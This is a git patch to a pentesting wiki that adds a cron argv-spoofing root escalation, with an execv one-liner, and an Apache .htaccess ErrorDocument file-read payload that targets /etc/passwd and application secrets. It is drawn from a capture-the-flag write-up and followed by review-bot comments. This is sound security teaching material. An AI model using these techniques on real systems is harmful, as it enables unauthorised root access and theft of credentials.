From 8a3275fb2bb9c55014b2dfd796f35a5523a3e96f Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Wed, 27 Aug 2025 15:29:12 +0200 Subject: [PATCH] =?UTF-8?q?Add=20content=20from:=20HTB=20Zero:=20.htaccess?= =?UTF-8?q?=20ErrorDocument=20LFI=20=E2=86=92=20credential=20reuse=20?= =?UTF-8?q?=E2=86=92=20r...?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit - Remove searchindex.js (auto-generated file) --- .../privilege-escalation/README.md | 51 ++++++++++++++++++- .../pentesting-web/apache.md | 38 ++++++++++++-- 2 files changed, 85 insertions(+), 4 deletions(-) diff --git a/src/linux-hardening/privilege-escalation/README.md b/src/linux-hardening/privilege-escalation/README.md index 835a6bdb1..edc0a6e9b 100644 --- a/src/linux-hardening/privilege-escalation/README.md +++ b/src/linux-hardening/privilege-escalation/README.md 
@@ -452,6 +452,55 @@ It's possible to create a cronjob **putting a carriage return after a comment** #This is a comment inside a cron config file\r* * * * * echo "Surprise!" ``` +### pgrep/ps argv spoofing in privileged cron scripts + +If a root cron/systemd timer script constructs commands from untrusted process listings, you can often escalate privileges by forging a process argv that the script consumes. + +Vulnerable pattern (real-world example simplified): + +```bash +#!/usr/bin/bash +RET=0 +while read pid _cmd ; do + # Replace apache2 with apache2ctl and add -t for test + cmd="${_cmd/apache2/apache2ctl} -t" + $cmd >/dev/null 2>&1 + RET=$? +done <<< $(/usr/bin/pgrep -lfa "^/opt/zroweb/sbin/apache2.-k.start.-d./opt/zroweb/conf") +exit $RET +``` + +Why vulnerable +- pgrep -lfa prints PID and full command line of matching processes. Any user can spawn a process whose argv[0] matches the regex. +- The script performs naive string substitution and then executes the resulting $cmd as root. + +Exploit primitive: forge argv with execv + +```bash +# Make a fake process whose argv[0] matches the regex and inject flags we want +python3 -c 'import os; os.execv("/bin/sleep", ["/opt/zroweb/sbin/apache2 -k start -d /opt/zroweb/conf -f /home/me/pwn.conf", "60"])' +# Verify it shows up as intended +pgrep -lfa apache2 +``` + +The cron will then run, as root, something like: + +```bash +/opt/zroweb/sbin/apache2ctl -k start -d /opt/zroweb/conf -f /home/me/pwn.conf -t +``` + +From primitive to root +- Use -f /path/to/attacker.conf to point apache2ctl to a config you fully control; you can also override -d to influence ServerRoot resolution. +- Craft attacker.conf to leverage Apache behaviors that execute privileged helpers during config parsing/startup (e.g., piped logs or other directives that may spawn programs during validation/startup in your target’s build). This can yield root-level command execution or privileged file writes even if the script runs with -t. 
+ +Detection and mitigation +- Never execute strings built from process listings. Use fixed argv arrays and strict allowlists for both program and arguments. +- If you must inspect processes, parse safely and avoid substituting and executing arbitrary strings; do not pass untrusted data through the shell. +- Drop privileges in health-check jobs and test configs as an unprivileged user. + +References +- [HTB Zero write-up showing this abuse and path to root](https://0xdf.gitlab.io/2025/08/12/htb-zero.html) + ## Services ### Writable _.service_ files @@ -1673,7 +1722,7 @@ cisco-vmanage.md - [https://linuxconfig.org/how-to-manage-acls-on-linux](https://linuxconfig.org/how-to-manage-acls-on-linux) - [https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure\&qid=e026a0c5f83df4fd532442e1324ffa4f](https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f) - [https://www.linode.com/docs/guides/what-is-systemd/](https://www.linode.com/docs/guides/what-is-systemd/) - +- [HTB Zero: .htaccess ErrorDocument LFI → argv spoofing cron abuse](https://0xdf.gitlab.io/2025/08/12/htb-zero.html) ## Android rooting frameworks: manager-channel abuse diff --git a/src/network-services-pentesting/pentesting-web/apache.md b/src/network-services-pentesting/pentesting-web/apache.md index 197d80d01..2d7a1232e 100644 --- a/src/network-services-pentesting/pentesting-web/apache.md +++ b/src/network-services-pentesting/pentesting-web/apache.md 
@@ -27,6 +27,38 @@ uid=1(daemon) gid=1(daemon) groups=1(daemon) Linux ``` +## LFI via .htaccess ErrorDocument file provider (ap_expr) + +If you can control a directory’s .htaccess and AllowOverride includes FileInfo for that path, you can turn 404 responses into arbitrary local file reads using the ap_expr file() function inside ErrorDocument. + +- Requirements: + - Apache 2.4 with expression parser (ap_expr) enabled (default in 2.4). + - The vhost/dir must allow .htaccess to set ErrorDocument (AllowOverride FileInfo). + - The Apache worker user must have read permissions on the target file. + +.htaccess payload: + +```apache +# Optional marker header just to identify your tenant/request path +Header always set X-Debug-Tenant "demo" +# On any 404 under this directory, return the contents of an absolute filesystem path +ErrorDocument 404 %{file:/etc/passwd} +``` + +Trigger by requesting any non-existing path below that directory, for example when abusing userdir-style hosting: + +```bash +curl -s http://target/~user/does-not-exist | sed -n '1,20p' +``` + +Notes and tips: +- Only absolute paths work. The content is returned as the response body for the 404 handler. +- Effective read permissions are those of the Apache user (typically www-data/apache). You won’t read /root/* or /etc/shadow in default setups. +- Even if .htaccess is root-owned, if the parent directory is tenant-owned and permits rename, you may be able to rename the original .htaccess and upload your own replacement via SFTP/FTP: + - rename .htaccess .htaccess.bk + - put your malicious .htaccess +- Use this to read application source under DocumentRoot or vhost config paths to harvest secrets (DB creds, API keys, etc.). + ## Confusion Attack These types of attacks has been introduced and documented [**by Orange in this blog post**](https://blog.orange.tw/2024/08/confusion-attacks-en.html?m=1) and the following is a summary. 
The "confusion" attack basically abuses how the tens of modules that work together creating a Apache don't work perfectly synchronised and making some of them modify some unexpected data can cause a vulnerability in a later module. @@ -274,8 +306,8 @@ Check [**Docker PHP LFI Summary**](https://www.leavesongs.com/PENETRATION/docker ## References - [https://blog.orange.tw/2024/08/confusion-attacks-en.html?m=1](https://blog.orange.tw/2024/08/confusion-attacks-en.html?m=1) +- [Apache 2.4 Custom Error Responses (ErrorDocument)](https://httpd.apache.org/docs/2.4/custom-error.html) +- [Apache 2.4 Expressions and functions (file:)](https://httpd.apache.org/docs/2.4/expr.html) +- [HTB Zero write-up: .htaccess ErrorDocument LFI and cron pgrep abuse](https://0xdf.gitlab.io/2025/08/12/htb-zero.html) {{#include ../../banners/hacktricks-training.md}} - - -
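Review bot: the "Detection and mitigation" block in the README `@@ -452,6 +452,55 @@` hunk contains no detection guidance, only three mitigation bullets; either rename it "Mitigation" or add a detection bullet, for example auditing which binary the root cron actually execs (the expected path is /opt/zroweb/sbin/apache2ctl, so any other program, or an unexpected `-f` argument, appearing in that job's exec records is the signal a defender should alert on). Two smaller points: the sentence claiming privileged helpers run during `-t` validation is hedged ("may spawn programs ... in your target's build") without naming a mechanism, so either cite the specific directive from the referenced write-up or state plainly that it is build-dependent; and "Why vulnerable", "Exploit primitive: forge argv with execv", "From primitive to root", "Detection and mitigation" and "References" are bare text lines while the surrounding file uses `##`/`###` headings, so they should be `####` headings to render consistently.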
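Review bot: in the README `@@ -1673,7 +1722,7 @@` hunk the new reference title ".htaccess ErrorDocument LFI → argv spoofing cron abuse" does not match the title given to the same URL in the section-level References list earlier in this patch ("HTB Zero write-up showing this abuse and path to root"); use one title for one link. The non-ASCII arrow is also what forced the MIME-encoded Subject line in the header; a plain ASCII "->" keeps both the reference title and the commit subject greppable.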
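Review bot: the apache.md `@@ -27,6 +27,38 @@` hunk gives requirements and a payload but no hardening counterpart, unlike the cron section in the same patch; add a short mitigation list derived from the stated requirements: do not grant AllowOverride FileInfo (or any .htaccess override) in tenant-writable directories, keep the parent directory non-writable by the tenant so .htaccess cannot be renamed and replaced over SFTP/FTP, and run the worker as a user that cannot read vhost config or application secrets outside its own DocumentRoot. The requirements bullet "Apache 2.4 with expression parser (ap_expr) enabled (default in 2.4)" should also state the minimum 2.4.x release in which ErrorDocument accepts expression syntax, which the linked custom-error documentation gives; "default in 2.4" sets a wrong expectation on older 2.4 builds. Minor: the `Header always set X-Debug-Tenant` line depends on mod_headers being loaded; say so, or drop it since it is marked optional.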
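Review bot: in the apache.md `@@ -274,8 +306,8 @@` hunk the HTB Zero reference is titled ".htaccess ErrorDocument LFI and cron pgrep abuse", a third wording for the same URL that already appears twice in README.md with two other titles; pick one. The hunk also deletes the three trailing blank lines after the banner include, an unrelated whitespace cleanup that the commit message should mention; conversely, the only body line of the commit message, "Remove searchindex.js (auto-generated file)", describes a change that is not in this patch, since the diffstat lists only README.md and apache.md, so either that removal was dropped from the patch or the message is stale.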